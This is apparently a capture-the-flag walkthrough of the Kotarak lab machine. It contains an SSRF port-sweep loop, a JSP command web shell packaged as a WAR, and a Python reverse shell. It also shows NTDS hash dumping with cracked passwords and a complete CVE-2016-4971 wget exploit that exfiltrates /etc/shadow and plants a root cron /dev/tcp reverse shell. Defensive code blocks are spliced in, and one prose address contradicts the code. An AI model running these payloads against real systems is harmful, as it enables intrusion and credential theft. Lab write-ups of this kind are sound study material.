[Meachines] [Hard] Kotarak SSRF port scan + AD domain ntds.dit data…

2024-10-13

Information Gathering

IP Address     Open Ports
10.10.10.55    TCP: 22, 8009, 8080, 60000

$ nmap -p- 10.10.10.55 --min-rate 10000 -sC -sV

PORT     STATE SERVICE VERSION
22/tcp   open  ssh     OpenSSH 7.2p2 Ubuntu 4ubuntu2.2 (Ubuntu Linux; protocol 2.0)
| ssh-hostkey: 
|   2048 e2:d7:ca:0e:b7:cb:0a:51:f7:2e:75:ea:02:24:17:74 (RSA)
|   256 e8:f1:c0:d3:7d:9b:43:73:ad:37:3b:cb:e1:64:8e:e9 (ECDSA)
|_  256 6d:e9:26:ad:86:02:2d:68:e1:eb:ad:66:a0:60:17:b8 (ED25519)
8080/tcp open  http    Apache Tomcat 8.5.5
| http-methods: 
|_  Potentially risky methods: PUT DELETE
|_http-favicon: Apache Tomcat
|_http-title: Apache Tomcat/8.5.5 - Error report
60000/tcp open     unknown 
Service Info: OS: Linux; CPE: cpe:/o:linux:linux_kernel

SSRF Port Scan

http://10.10.10.55:8080/manager/status

http://10.10.10.55:60000/

$ feroxbuster --url http://10.10.10.55:60000

$ time for i in {1..65535}; do res=$(curl -s "http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1%3A${i}"); len=$(echo "$res" | wc -w); if [ "$len" -gt 0 ]; then echo -n "${i}: "; echo "$res" | tr -d "\r" | head -1 | cut -c-100; fi; done

http://10.10.10.55:60000/url.php?path=http%3A%2F%2F127.0.0.1%3A888

view-source:http://10.10.10.55:60000/url.php?path=http%3a%2f%2f127.0.0.1%3a888%3fdoc%3dbackup

username:admin password:3@g01PdhB!
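The port sweep above works because url.php fetches whatever `path` it is handed, loopback addresses and arbitrary ports included. As an added example (not code from the writeup or from the box), here is the validation a server-side fetcher should apply before making the request: it allows only http/https, refuses credentials in the URL, resolves the host and rejects anything that lands on a loopback, private, link-local or otherwise internal address, and pins the port to 80/443. The `resolver` argument and the `FAKE_DNS` table are assumptions so the check can run offline; in production the default `socket.getaddrinfo` is used.

```python
import ipaddress
import socket
from urllib.parse import urlsplit

# Only plain web fetches are allowed; file://, ftp://, gopher:// and friends are refused outright.
ALLOWED_SCHEMES = {"http", "https"}


def _is_internal(ip):
    """True for any address a server-side fetcher must never be steered to."""
    return (ip.is_loopback or ip.is_private or ip.is_link_local
            or ip.is_multicast or ip.is_reserved or ip.is_unspecified)


def is_safe_fetch_target(url, resolver=socket.getaddrinfo):
    """Return (ok, reason) for a user-supplied URL such as the `path` parameter of url.php.

    `resolver` is injectable so the check can be exercised without network access;
    in production it is the real socket.getaddrinfo.
    """
    try:
        parts = urlsplit(url)
    except ValueError:
        return False, "unparseable URL"
    scheme = parts.scheme.lower()
    if scheme not in ALLOWED_SCHEMES:
        return False, "scheme %r not allowed" % scheme
    if parts.username is not None or parts.password is not None:
        return False, "credentials in URL"
    host = parts.hostname
    if not host:
        return False, "missing host"
    try:
        port = parts.port
    except ValueError:
        return False, "invalid port"
    try:
        addrs = [ipaddress.ip_address(host)]          # literal IP, no DNS needed
    except ValueError:
        try:
            infos = resolver(host, None)
        except socket.gaierror:
            return False, "DNS resolution failed"
        addrs = [ipaddress.ip_address(info[4][0]) for info in infos]
    for ip in addrs:
        if _is_internal(ip):
            return False, "%s resolves to internal address %s" % (host, ip)
    if port not in (None, 80, 443):
        return False, "port %d not allowed" % port
    return True, "ok"


# Constructed, offline stand-in for DNS (assumption): name -> addresses a resolver would return.
FAKE_DNS = {
    "example.com": ["93.184.216.34"],
    "intranet.local": ["10.10.10.55"],
}


def fake_resolver(host, port):
    """Mimics socket.getaddrinfo's return shape for the names in FAKE_DNS."""
    try:
        return [(socket.AF_INET, socket.SOCK_STREAM, 6, "", (addr, 0)) for addr in FAKE_DNS[host]]
    except KeyError:
        raise socket.gaierror("name not known: %s" % host)


if __name__ == "__main__":
    for candidate in ("http://127.0.0.1:888?doc=backup", "ftp://example.com/x",
                      "http://intranet.local/", "http://[::1]/", "http://example.com/"):
        print(candidate, "->", is_safe_fetch_target(candidate, fake_resolver))
```

Two caveats a validator alone does not cover: the resolved address must also be the one actually connected to (otherwise a DNS answer that changes between check and fetch bypasses it), and the fetcher must not follow redirects, since a 302 from an external host to 127.0.0.1 would re-open the port-sweep path.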

tomcat war && DMZ

http://10.10.10.55:8080/manager/html

#!/bin/sh
# gen_war.sh
wget https://raw.githubusercontent.com/tennc/webshell/master/jsp/jspbrowser/Browser.jsp -O index.jsp 
rm -rf wshell 
rm -f wshell.war 
mkdir wshell    
cp index.jsp wshell/ 
cd wshell 
jar -cvf ../wshell.war * 

http://10.10.10.55:8080/wshell/index.jsp

<%@ page import="java.util.*,java.io.*"%>
<%
//
// JSP_KIT
//
// cmd.jsp = Command Execution (unix)
//
// by: Unknown
// modified: 27/06/2003
//
%>
<HTML><BODY>
<FORM METHOD="GET" NAME="myform" ACTION="">
<INPUT TYPE="text" NAME="cmd">
<INPUT TYPE="submit" VALUE="Send">
</FORM>
<pre>
<%
if (request.getParameter("cmd") != null) {
        out.println("Command: " + request.getParameter("cmd") + "<BR>");
        Process p = Runtime.getRuntime().exec(request.getParameter("cmd"));
        OutputStream os = p.getOutputStream();
        InputStream in = p.getInputStream();
        DataInputStream dis = new DataInputStream(in);
        String disr = dis.readLine();
        while ( disr != null ) {
                out.println(disr); 
                disr = dis.readLine(); 
                }
        }
%>
</pre>
</BODY></HTML>

http://10.10.10.55:8080/wshell/rev.jsp

Upload the Python reverse shell code

import socket,subprocess,os;s=socket.socket(socket.AF_INET,socket.SOCK_STREAM);s.connect(("10.10.16.12",10032));os.dup2(s.fileno(),0); os.dup2(s.fileno(),1);os.dup2(s.fileno(),2);import pty; pty.spawn("/bin/sh")

Run it

python3 /opt/tomcat/webapps/wshell/re.py

I was stuck here for a while... the war package generated by msf had problems... the shell didn't seem to connect back via bash, php, or jsp. This jsp backdoor's command execution has issues...

Strongly recommend switching to an msf session right away

ntds.dit Recovery

http://10.10.10.55:8080/wshell/index.jsp?sort=1&dir=%2fhome%2ftomcat%2fto_archive%2fpentest_data

Download these two files

$ impacket-secretsdump -ntds 20170721114636_default_192.168.110.133_psexec.ntdsgrab._333512.dit -system 20170721114637_default_192.168.110.133_psexec.ntdsgrab._089134.bin LOCAL

Administrator:500:aad3b435b51404eeaad3b435b51404ee:e64fe0f24ba2489c05e64354d74ebd11:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WIN-3G2B0H151AC$:1000:aad3b435b51404eeaad3b435b51404ee:668d49ebfdb70aeee8bcaeac9e3e66fd:::
krbtgt:502:aad3b435b51404eeaad3b435b51404ee:ca1ccefcb525db49828fbb9d68298eee:::
WIN2K8$:1103:aad3b435b51404eeaad3b435b51404ee:160f6c1db2ce0994c19c46a349611487:::
WINXP1$:1104:aad3b435b51404eeaad3b435b51404ee:6f5e87fd20d1d8753896f6c9cb316279:::
WIN2K31$:1105:aad3b435b51404eeaad3b435b51404ee:cdd7a7f43d06b3a91705900a592f3772:::
WIN7$:1106:aad3b435b51404eeaad3b435b51404ee:24473180acbcc5f7d2731abe05cfa88c:::
atanas:1108:aad3b435b51404eeaad3b435b51404ee:2b576acbe6bcfda7294d6bd18041b8fe:::

Check which LM values can be cracked

https://crackstation.net/

Results for two users

Administrator:f16tomcat!
atanas:Password123!
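Before any of those hashes go near a cracker, the dump format itself already answers several audit questions. As an added example (not from the writeup or from impacket), the script below parses secretsdump's `user:rid:lmhash:nthash:::` lines and flags three things a defender reviewing such a dump wants to know: accounts that still store a real LM hash (every line above carries the well-known empty-LM value `aad3b435b51404eeaad3b435b51404ee`), non-machine accounts whose NT hash is the empty-password hash `31d6cfe0d16ae931b73c59d7e0c089c0` (the Guest line above), and accounts sharing one NT hash, which means the same password. The `SAMPLE_DUMP` is constructed; apart from the Guest line and the two empty-hash constants, its hashes are made-up hex, not real credentials.

```python
import re
from collections import defaultdict
from dataclasses import dataclass

# Well-known constants: the LM field stored when LM storage is disabled (or the
# password exceeds 14 characters), and the NT hash of an empty password.
EMPTY_LM = "aad3b435b51404eeaad3b435b51404ee"
EMPTY_NT = "31d6cfe0d16ae931b73c59d7e0c089c0"

# user:rid:lmhash:nthash::: as printed by secretsdump (user may carry a DOMAIN\ prefix)
LINE_RE = re.compile(
    r"^(?P<user>[^:]+):(?P<rid>\d+):(?P<lm>[0-9a-fA-F]{32}):(?P<nt>[0-9a-fA-F]{32}):::")


@dataclass
class Account:
    user: str
    rid: int
    lm: str
    nt: str

    @property
    def is_machine(self):
        # Computer accounts end in '$' and carry random passwords; skip them in password checks.
        return self.user.endswith("$")


def parse_secretsdump(text):
    """Parse pwdump-style lines; banner lines such as '[*] Dumping ...' are skipped."""
    accounts = []
    for raw in text.splitlines():
        m = LINE_RE.match(raw.strip())
        if m:
            accounts.append(Account(m["user"], int(m["rid"]), m["lm"].lower(), m["nt"].lower()))
    return accounts


def audit(accounts):
    """Return the findings a reviewer wants straight from the dump, no cracking needed."""
    by_nt = defaultdict(list)
    findings = {"lm_present": [], "blank_password": [], "shared_nt": {}}
    for a in accounts:
        if a.lm != EMPTY_LM:
            findings["lm_present"].append(a.user)          # LM hashes crack in minutes
        if a.nt == EMPTY_NT and not a.is_machine:
            findings["blank_password"].append(a.user)      # empty password on a user account
        by_nt[a.nt].append(a.user)
    # Same NT hash on two accounts == same password (password reuse across accounts).
    findings["shared_nt"] = {h: users for h, users in by_nt.items()
                             if len(users) > 1 and h != EMPTY_NT}
    return findings


# Constructed sample in secretsdump's output format. Only the Guest line is taken from
# the dump above; the other hashes are placeholder hex, not real credentials.
SAMPLE_DUMP = """\
[*] Dumping Domain Credentials (domain\\uid:rid:lmhash:nthash)
Administrator:500:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
Guest:501:aad3b435b51404eeaad3b435b51404ee:31d6cfe0d16ae931b73c59d7e0c089c0:::
WS01$:1106:aad3b435b51404eeaad3b435b51404ee:ffeeddccbbaa99887766554433221100:::
svc_backup:1200:aad3b435b51404eeaad3b435b51404ee:00112233445566778899aabbccddeeff:::
legacy:1201:0123456789abcdef0123456789abcdef:fedcba9876543210fedcba9876543210:::
"""

if __name__ == "__main__":
    for name, value in audit(parse_secretsdump(SAMPLE_DUMP)).items():
        print("%-15s %s" % (name, value))
```

Run against the real dump, the same three checks tell you which accounts need a forced reset immediately (blank or shared passwords) and whether `NoLMHash` is actually enforced domain-wide, independent of what a wordlist later recovers.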

TRP00F Shortcut

Escalate directly from the tomcat user on the DMZ host to root

https://github.com/MartinxMax/trp00f/tree/master

$ python3 trp00f.py --lhost 10.10.16.12 --lport 10012 --rhost 10.10.16.12 --rport 10011 --http 1111

[!] Do you want to exploit the vulnerability in file 'pkexec' ? (y/n) >y

tomcat -> atanas

python3 -c 'import pty;pty.spawn("/bin/bash")'
tomcat@kotarak-dmz:/tmp$ su atanas -

f16tomcat!

User.txt

93f844f50491ef797c9c1b601b4bece8

Privilege Escalation && wget Privilege Escalation

It seems to be related to archive.tar.gz

authbind is a Linux tool that allows unprivileged users to bind to low-numbered ports (below 1024).

CVE-2016-4971 is a clever vulnerability affecting Wget versions < 1.18; it abuses the way wget handles HTTP redirects to an FTP server. When wget follows an HTTP redirect to another address, it fetches that file but still saves it under the originally requested file name.

For example, if wget sends a GET request to http://a.com/a/a.txt and the server responds with a 301 or 302 redirect to ftp://b.com/b.txt, wget will fetch the file b.txt.
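The two behaviours that matter in that description are which scheme a redirect may switch to and which name the downloaded file gets. As an added example (not from the writeup, not wget's code, and only modelled on the fix shipped in wget 1.18), the Python below encodes a client-side policy: the local file name is always derived from the URL that was requested, never from the `Location` target, and a hop to a non-HTTP scheme (the http -> ftp hop described above) or an https -> http downgrade is refused. `check_redirect` is the pure policy function; `PinnedNameRedirectHandler` and `fetch_with_policy` are assumptions showing how it plugs into `urllib`, whose default opener would otherwise happily hand an ftp:// redirect to its FTP handler.

```python
import posixpath
import urllib.error
import urllib.request
from urllib.parse import urljoin, urlsplit

SAFE_SCHEMES = {"http", "https"}


def local_name_from(url):
    """Name the saved file after the URL that was *requested*, never after a redirect target."""
    name = posixpath.basename(urlsplit(url).path)
    return name or "index.html"


def check_redirect(original_url, location):
    """Decide whether a Location header may be followed.

    Returns (ok, reason, local_name). Relative Location values are resolved
    against the original URL first, as a browser or wget would.
    """
    target = urljoin(original_url, location)
    orig, dest = urlsplit(original_url), urlsplit(target)
    if dest.scheme.lower() not in SAFE_SCHEMES:
        return False, "redirect to non-HTTP scheme %r" % dest.scheme, None
    if orig.scheme.lower() == "https" and dest.scheme.lower() == "http":
        return False, "https -> http downgrade", None
    return True, "ok", local_name_from(original_url)


class PinnedNameRedirectHandler(urllib.request.HTTPRedirectHandler):
    """urllib redirect handler that applies check_redirect on every hop (assumed design)."""

    def __init__(self, original_url):
        super().__init__()
        self.original_url = original_url
        self.local_name = local_name_from(original_url)   # fixed before any redirect is seen

    def redirect_request(self, req, fp, code, msg, headers, newurl):
        ok, reason, _ = check_redirect(self.original_url, newurl)
        if not ok:
            # Same exception type urllib itself raises for a refused redirect.
            raise urllib.error.HTTPError(newurl, code, "refused redirect: " + reason, headers, fp)
        return super().redirect_request(req, fp, code, msg, headers, newurl)


def fetch_with_policy(url, timeout=10):
    """Download `url`, following only policy-approved redirects; returns (local_name, body)."""
    handler = PinnedNameRedirectHandler(url)
    opener = urllib.request.build_opener(handler)
    with opener.open(url, timeout=timeout) as resp:
        return handler.local_name, resp.read()


if __name__ == "__main__":
    # Offline demonstration of the policy on the redirect from the text.
    print(check_redirect("http://a.com/a/a.txt", "ftp://b.com/b.txt"))
    print(check_redirect("http://a.com/a/a.txt", "http://b.com/b.txt"))
```

The operational lesson is the same whichever client is used: a scheduled fetch that runs as root and trusts the remote side for the output file name is one redirect away from writing attacker-chosen content to an attacker-chosen path, so upgrade wget past 1.18 and run such jobs as an unprivileged user.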

When we listen on port 80 with authbind, 10.0.3.1 fetches /archive.tar.gz every 2 minutes.

atanas@kotarak-dmz:/root$ authbind nc -lnvp 80

EXP

1. The attacker creates a malicious .wgetrc file (in this case on the attacker's machine)

echo "post_file = /etc/shadow" > .wgetrc
echo "output_document = /etc/cron.d/wget-root-shell" >> .wgetrc

2. The attacker starts an FTP server (in this case on the attacker's machine)

$ python -m pyftpdlib -p 21 -w

3. Start the malicious HTTP server on the target machine

# wget-exploit.py
# CVE-2016-4971

import SimpleHTTPServer
import SocketServer
import socket;

class wgetExploit(SimpleHTTPServer.SimpleHTTPRequestHandler):
   def do_GET(self):
       # This takes care of sending .wgetrc

       print "We have a volunteer requesting " + self.path + " by GET :)\n"
       if "Wget" not in self.headers.getheader('User-Agent'):
          print "But it's not a Wget :( \n"
          self.send_response(200)
          self.end_headers()
          self.wfile.write("Nothing to see here...")
          return

       print "Uploading .wgetrc via ftp redirect vuln. It should land in /root \n"
       self.send_response(301)
       new_path = '%s'%('ftp://anonymous@%s:%s/.wgetrc'%(FTP_HOST, FTP_PORT) )
       print "Sending redirect to %s \n"%(new_path)
       self.send_header('Location', new_path)
       self.end_headers()

   def do_POST(self):
       # In here we will receive extracted file and install a PoC cronjob

       print "We have a volunteer requesting " + self.path + " by POST :)\n"
       if "Wget" not in self.headers.getheader('User-Agent'):
          print "But it's not a Wget :( \n"
          self.send_response(200)
          self.end_headers()
          self.wfile.write("Nothing to see here...")
          return

       content_len = int(self.headers.getheader('content-length', 0))
       post_body = self.rfile.read(content_len)
       print "Received POST from wget, this should be the extracted /etc/shadow file: \n\n---[begin]---\n %s \n---[eof]---\n\n" % (post_body)

       print "Sending back a cronjob script as a thank-you for the file..."
       print "It should get saved in /etc/cron.d/wget-root-shell on the victim's host (because of .wgetrc we injected in the GET first response)"
       self.send_response(200)
       self.send_header('Content-type', 'text/plain')
       self.end_headers()
       self.wfile.write(ROOT_CRON)

       print "\nFile was served. Check on /root/hacked-via-wget on the victim's host in a minute! :) \n"

       return

HTTP_LISTEN_IP = '10.0.3.1'
HTTP_LISTEN_PORT = 80
FTP_HOST = '10.10.16.12'
FTP_PORT = 21

ROOT_CRON = "* * * * * root bash -c 'bash -i >& /dev/tcp/10.10.16.12/10099 0>&1' \n"

handler = SocketServer.TCPServer((HTTP_LISTEN_IP, HTTP_LISTEN_PORT), wgetExploit)

print "Ready? Is your FTP server running?"

sock = socket.socket(socket.AF_INET, socket.SOCK_STREAM)
result = sock.connect_ex((FTP_HOST, FTP_PORT))
if result == 0:
   print "FTP found open on %s:%s. Let's go then\n" % (FTP_HOST, FTP_PORT)
else:
   print "FTP is down :( Exiting."
   exit(1)

print "Serving wget exploit on port %s...\n\n" % HTTP_LISTEN_PORT

handler.serve_forever()

This Python script is an example exploit for CVE-2016-4971; specifically, it does the following:

  1. HTTP server: it creates a simple HTTP server listening on the specified IP address and port (10.0.3.1:80).

  2. Handling GET requests: when a GET request arrives, the script checks whether the User-Agent header is Wget. If so, it sends a 301 redirect pointing at an FTP server (10.10.16.12:21) that hosts a malicious .wgetrc file.

  3. Handling POST requests: when a POST request arrives, the script reads and prints the file content extracted from the victim machine (usually /etc/shadow). It then responds with a malicious cron job (ROOT_CRON) that runs every minute and tries to establish a reverse shell connection to the attacker's machine (10.10.14.15:443).

  4. FTP check: on startup, the script checks whether the specified FTP server is reachable; if not, it exits.

$ authbind python2 wget-exploit.py

After waiting for 10.0.3.1 to make two requests, about 4 minutes later we receive the response, and the reverse shell is triggered from the cron job.

Root.txt

950d1425795dfd38272c93ccbb63ae2c
